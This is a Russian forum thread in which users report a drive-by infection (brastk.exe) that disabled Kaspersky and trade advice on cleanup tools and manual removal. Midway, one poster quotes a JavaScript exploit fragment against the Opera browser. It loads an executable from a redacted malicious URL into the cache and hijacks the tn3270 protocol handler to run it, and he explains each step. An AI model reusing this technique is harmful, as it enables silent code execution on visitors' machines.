Владельцам Касперского. Будьте бдительны.

[Fossa]

Отчет о моей вирусной эпопее и пара советов

Эпиграф:
"Если у вас нет паранойи, это не значит, что они за вами не следят"

Прелюдия

Если у вас стоит лицензионный каспер и вы не качаете порно-видео, это не значит, что есть повод расслабиться.
У меня стоял лицензионный касперский и я вообще ничего не качала - ни порно, ни мультики, ни видео, ни аудио, ни даже текст. Просто зашла на сайт зайцев.нет.
Коллега по работе подхватил аналогичный вирус, зайдя на сайтик московской строительной фирмы (тоже ничего не качая, качать там просто нечего).
У кого-то касперский может отбить атаку.
У кого-то нод или аутпост может отбить атаку.
Но может не повезти.
Дело случая, к сожалению. Русская рулетка.
В лаборатории касперского сказали, что их там в сети сейчас целая серия новых вирусов. Против которых пока стопроцентной защиты нет. Популярными являются bravias.exe, brastk.exe и другие.

На меня напал brastk.exe

Протекание болезни

Касперский успел сообщить, что обнаружена попытка воздействия вредоносного объекта. Разрешить/запретить? В принципе, можно было уже ничего не нажимать, было поздно. Я нажала "запретить".

Но к этому времени защита была мертва. Вирус на входе острелил касперского наповал. Вообще выбил из процессов и трея.
А в трее поселилась отвратительная штуковина.








В Панели управления добавился новый аплет




Он докачивал радостно себе своих вирусных коллег. Остановить этот беспредел было невозможно.

В безопасном режиме ничего не убивалось.
Интернет умер сразу. Удавалось выйти через дайл ап, пока вирус озадаченно пытался прервать этот допотопный вариант выхода в сеть, проходило минуты две. За две минуты я успевала написать че нито на форуме касперского и наступал аут...

Лечение

Щас лаборатория касперского под наплывом жалоб потребителей бешено разрабатывает защиту от этих монстров. Так что может через пару дней мои советы будут уже не актуальны. Хорошо бы. Но на всякий случай, сообщаю...

Если все-таки не повезло, словили brastk или что то похожее, лечиться приходится на форуме касперского. В индивидуальном порядке. В разделе "Помощь по продуктам".
http://forum.kasperskyclub.ru/index.php?showforum=12

Заходите, регистрируетесь, жалуетесь в отдельной теме.
Оформлять тему надо по правилам, предварительно "создав логи", и повесить эти логи внутри темы.

Как создавать и вывешивать логи - тут все подробно написано. Копировать не буду.
http://forum.kasperskyclub.ru/index.php?showtopic=1698

Реагируют там сразу, некоторых вылечивали за час-полтора. И не играет роли, какой антивирусник полетел - касперский или нод или еще какой-то. Вообще роли не играет. Заразился чем-то пиратским, умер нод, они никакой морали не читают. Сразу советы по делу.
В общем, молодцы они, хорошую службу создали.

Профилактика

Надеюсь, вся эта тема вам не пригодится (ттт).
Но если вдруг чего, то для создания и вывешивания логов (ключевой момент для получения дальнейших инструкций на форуме) нужны будут три крохотных программы-утилиты.
Вот прямо настоятельно рекомендую: лучше их скачать щас, пока все нормально. Это займет три минуты времени и пять мб на диске.
Зато ежели че - вы сразу дуете на форум и все сразу вывешиваете.
А так процесс получения этих утилит при отсутствии интернета на выделенке и сомнительного качества дайл-апе может занять полдня...

Утилита к касперскому AVZ, около 3.5 МБ.
http://z-oleg.com/avz4.zip

Утилита HiJackThis, около 800 кБ.
http://www.trendsecure.com/portal/en...HiJackThis.zip

Утилита для лечения IceSword, 2.2 МБ
http://wise-wistful.ifolder.ru/6132475

*****************

Чтоб вам это все нафик вообще не понадобилось...

[_Dmitry]

второй линк на HiJackThis - 404

[Fossa]

Цитата:

Сообщение от _Dmitry

второй линк на HiJackThis - 404

У меня (Opera) все открывается.
Там страница htm, на ней три уже прямых линка на выбор.

http://www.trendsecure.com/portal/en...HJTInstall.exe

http://www.trendsecure.com/portal/en...HiJackThis.zip

http://www.trendsecure.com/portal/en...HiJackThis.exe


Забыла еще добавить.
Если все таки на вас нападет brastk или его аналог, AVZ и HiJackThis.exe, скорее всего, работать не будут. Вирус их блокирует на корню, как и любые другие антивирусники.

Чтоб решить проблему, AVZ надо переименовать во что угодно. Я называла свой файл game.exe.

HiJackThis.exe тоже переименовываем. Но он может все равно не запускаться. Тогда на всякий случай лучше заранее скачать еще один его вариант, уже переименованный и зашифрованный изначально.

http://virusinfo.info/soft/1.zip

После распаковки получится 1.bat. Его вирусы игнорируют. А зря

[Крыглоупек Грамцианский]

О чём это вы все???
Юзаю 7-го касперского.

[Kakavod]

Цитата:

Сообщение от Крыглоупек Грамцианский

О чём это вы все???
Юзаю 7-го касперского.

А я 8-ого Каспера (8.0.0.454). Интересно, для меня это актуально?

[Fossa]

У меня 7.0 касперский, лицензия, ключи новые.
В лаборатории создателей касперского сказали, что роли не играет, какой антивирусник стоит и какой браузер. И седьмой каспер, и восьмой, и нод32 последнего обновления - все могут в любой момент полететь, если наткнутся на соответствующий вариант данного вируса. Причем закачка вируса идет при загрузке страницы сайта. Обычного невинного сайта с рисуночками и текстами.

Вот один из ответов их аналитиков дословно (сегодня вечером):

Данный вирус очень популярен и не только на Зайцах. И каждый день мы обнаруживаем новые модификации на новых сайтах.
Браузер здесь любой пропускает.
Совет только один: обязательно добавьте в список обнаруживаемых угроз "другие программы". Обновляйте базы антивируса в автоматическом режиме, не реже раз в два часа.
Карантин AVZ можно удалить: мавр сделал свое дело .

[Майк]

Пользуйтесь правильными браузерами, не забывая регулярно их обновлять.

p.s.
Мелкомягкое угребище, естественно, в список правильных браузеров не входит -)

[Meteora]

Нефиг из-под администраторского аккаунта по инету лазить.

[aaz]

Run as рулит.

[aaz]

В этой истории меня больше всего интересует, как вирус запускается.

[axel]

с какой целью интересуешься?

[aaz]

С разнообразными. В одну из первых очередей - врождённое любопытство.

[Fossa]

У меня в отчете умирающего Касперского от позавчерашнего утра осталось два предупреждения (ведь он успел мне проорать, что обнаружен вредоносный объект). Там и название и URL. Дать?

[aaz]

runas /noprofile /user:lamer@*** c:\progra~1\opera\opera.exe

Теперь давай.

[Fossa]

Отошла первая панель. Ключ на дренаж.
Запускай.

обнаружено: троянская программа Exploit.Win32.Pidief.iu
URL:

обнаружено: троянская программа Trojan-Downloader.JS.Tabletka.a
URL:

Жаль, что ты нам так и не успел рассказать, отгадал ли стартовое выражение для анаграмм...

[aaz]

PDF запускать не стал. В Адоб верую только в фотошоп, акробат - попса и кривизна.

А вот страничка пошла хорошо. Видно, что ребята старались. А уж изящность нагибания Оперы меня просто в восторг привела.

Но в итоге всё опять свелось к банальным экзешникам и ПДФкам. А я что, паталогоанатом, что ли? Да и не интересно уже.

В общем, во время проведения эксперимента ни одной системы не пострадало.

P.S. Ань, приношу свои извинения за небольшой розыгрыш.

[Майк]

А можно подробнее про нагибание оперы? Баг какой ветки юзают?

[aaz]

Да на сразу кусок скрипта (лишнее вырезано):

Код:

blank_iframe_window.eval( 
"var st;"+ 
"config_iframe = document.createElement('iframe');"+ 
"config_iframe.setAttribute('id', 'config_iframe_window');"+ 
"config_iframe.src = 'opera:config';"+ 
"document.appendChild(config_iframe);"+ 
"getcache();"+ 
"function getcache(){"+ 
"cache_iframe = document.createElement('iframe');"+ 
"cache_iframe.src = 'opera:cache';"+ 
"cache_iframe.onload = function (){"+ 
"cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();"+ 
"var re = new RegExp('(OPR\\\\\w{5}.EXE)</TD>\\\\\s*<TD>\\\\\d+</TD>\\\\\s*<TD><A HREF=\"'+'<очень плохой URL>','');"+ 
"filename = cache.match(re);"+ 
"if(!filename)return(0);"+ 
"config_iframe_window.eval("+ 
"\"opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\"+"+ 
"\"app_link = document.createElement('a');\"+"+ 
"\"app_link.setAttribute('href', 'tn3270://nothing');\"+"+ 
"\"app_link.click();\"+"+ 
"\"setTimeout(function(){opera.setPreference('Network','TN3270 App','telnet.exe');},1000);\""+ 
");"+ 
"clearTimeout(st);"+ 
"return(0);"+ 
"};"+ 
"document.appendChild(cache_iframe);"+ 
"st = setTimeout(function(){getcache();},2000);"+ 
"return(0);"+ 
"}" 
);

[Майк]

То ли ты много лишнего вырезал, то ли я туплю -) Но общий цимес не ясен. Открывает ифреймом кэш оперы, что-то в нем ищет, меняет обработчик протокола.. а причем там телнет ваще? )

[aaz]

Да тут всё просто. Скрипт грузит экзешник в кеш (стандартными средставми браузера, через iframe), далее находит его на диске, меняет обработчик протокола телнета (tn3270) на этот экзешник, посылает опере команду на коннект по этому протоколу (таким образом происходит запуск упомянутого экзешника), после чего заметает следы: через секунду возвращает обработчик tn3270 обратно (как правило) - в telnet.exe .

Красиво, правда?

[aaz]

Саму загрузку экзешника в кэш я в первом посте с кодом не показал. Но она банальна:

Код:

app_iframe = document.createElement('img');
app_iframe.src = '<очень плохой URL>';
document.appendChild(app_iframe); 

[Майк]

Отлично, очень изящно. Не, кто бы что не говорил, а работа создателя malware куда более творческая, нежели работа тех, кто им противостоит -)

[Майк]

Про эскплоиты, использующие уязвимости в браузерах, не слышал? -)

Гугль, wmf-уязвимость, например.

[aaz]

Слышал, конечно же. Меня детали именно этого случая интересуют.

По приведённым Анной ссылкам так или иначе дело сводилось к запуску экзешника либо открытию PDF'а. Думаю, в подавляющем большинстве открывали последний - ИМХО немного осталось (=выжило) непуганых юзеров, совершенно бездумно тыкающих на сыплющиеся из инета приложения. А вот с PDF... подозреваю, у многих он скачивается и открывается по умолчанию, без диалога о запросе скачивания и/или открытия. Если так, всё что я могу сказать - сами виноваты, товарищи.

[Fossa]

Цитата:

Сообщение от aaz

сами виноваты, товарищи.

А в чем вина-то товарищей? В том, что у них стоит Adobe Reader? Так многим по работе приходится иметь дело с дизайном, полиграфией и версткой. Без pdf тут, к несчастью, никак не обойтись.

[aaz]

Виноваты тем, что настроили свои браузеры на открытие документов без запроса.

Примечания:
1. "Виноваты" можно в кавычках.
2. Я не исключаю иного способа запуска заразы, при котором "вина" пользователя не столь очевидна либо отсутствует.

[Jag Mort]

Цитата:

Сообщение от Майк

Про эскплоиты, использующие уязвимости в браузерах, не слышал? -)

если браузер запущен от обычного юзера, то что страшного может произойти?
правильная политика безопасности и никакой касперский не нужен.
я два года без антивирусника на висте жил, потом зачем-то поставил нод32 (?), думаю опять его сносить, ибо нах не нужен

[Visual]

Цитата:

Сообщение от aaz

В этой истории меня больше всего интересует, как вирус запускается.

Чет aaz из аськи пропал. Наверное, запустил.

[Fossa]

Цитата:

Сообщение от Visual

Чет aaz из аськи пропал. Наверное, запустил.

Щас на дайл-апе выйдет.
Может, нажабишь этот момент?

[wildman]

Safari + MacOS рулит!

[Jag Mort]

[Andrey]

Эх... Как дети... В общем мой домашний комп вообще не парится по этому поводу - видимо, потому что нет времени шастать по всяким зайцам... ну да ладно...

Вчера отдали мне комп как раз в таким вирусняком, успешно пробившим защиту NOD32 с базами от 12.04.08... Сначала я как "ленивый юзер" порылся по Инету, покачал свежие cureit, ad-aware и прочие "специнструменты"... За 1,5 часа пришел к выводу о бесполезности такого метода ремонта. NOD32 обновить сумел, но толку никакого - он засекал только "последствия"...

Стало очевидно, что таки "надо включать мозг". Раскапывание "а что ж это у нас тут такое живучее грузиться где и когда" в течение 40 минут дало результат...

Вирус, хоть и "дюже злобен", но лечится "на раз" без применения антивирусов вообще. Так что, думаю, скоро сделают спецутилиту...

Согласно моим исследованиям зараза сидит в нескольких местах, а именно: нескольких файлах вида xxxx00.sys или xxx00xxx.sys в папке %windows%/system32/drivers. Отличаются размером около 32Kb и свежей датой создания...
Также важен файл %windows%/system32/winctrl32.dll (или как-то так).

Это по файловой составляющей. Сам файл brastk является генерируемым, как я понял...

Занятен запуск вируса... На первый взгляд вот оно: реестр hklm-software-microsoft-windows-currentversion-run... Но это - обманка )).

Настоящий старт вируса сидит совсем в другом месте . Вирус стартуется через использование "доверия винды к самой себе" в службах. В службах создается цельный вагон "фейковых" служб с дебильными названиями типа algsyswinmgnt например. Отличитальной чертой этих служб является исполнитяемый файл srv (без расширения и пути). Щас уже не помню - в итоге это позволяет "вешать обработчик на протокол".

Итого рецепт: загружаем комп в safe-морде, загружаем IceSword (удобен для поиска служб). Прямо в IceSword киляем все "нехорошие файлы" методом force delete, далее НЕ ПЕРЕЗАГРУЖАЯСЬ убиваем все "левые" службы. Я это делал родными средствами винды, то бишь sc delete ...

За 2 минуты прибил все файлы (штук около 7), еще минут за 20 все левые службы... Ребут... И жизнь налаживается . Во всяком случае сетевой активности нет (по мнению "железного" роутера во всяком случае), появляется резко возможность update винды, никаких вылезающих фигней не замечено. Специально сделал 3 тестовых ребута и чуть пошастал по нету. Всё ок.

PS. Вчера перекачал в сумме около 100метров разных антивирусов - ни один даже не засек эту дрянь )).

[Enigmatik]

+ 1 , около месяца назад примерно так же килял данную поделку .

[262й]

Видел такого зверя, с треккера была скачана какая то прога по борьбе со шпионами, часа полтора ушло на проверку и удаление и всех делов...

[Gosha %)]

каспер сакс, просто у них грамотная агрессивная рекламная политика, все на это и ведутся... имхо %)

[Lex]

буквально недавно лечил от такой заразы
Юзаю СВЕЖИЙ загрузочный диск от каспера + на нем же СВЕЖИЕ, кьюрит, авз и адваря. Эта свора прибивает все что неактивно и чуток реестр чистят. Потом в сайве добиваем остальное. Реестр авзшкой и ручками, если надо доправляем - УСЕ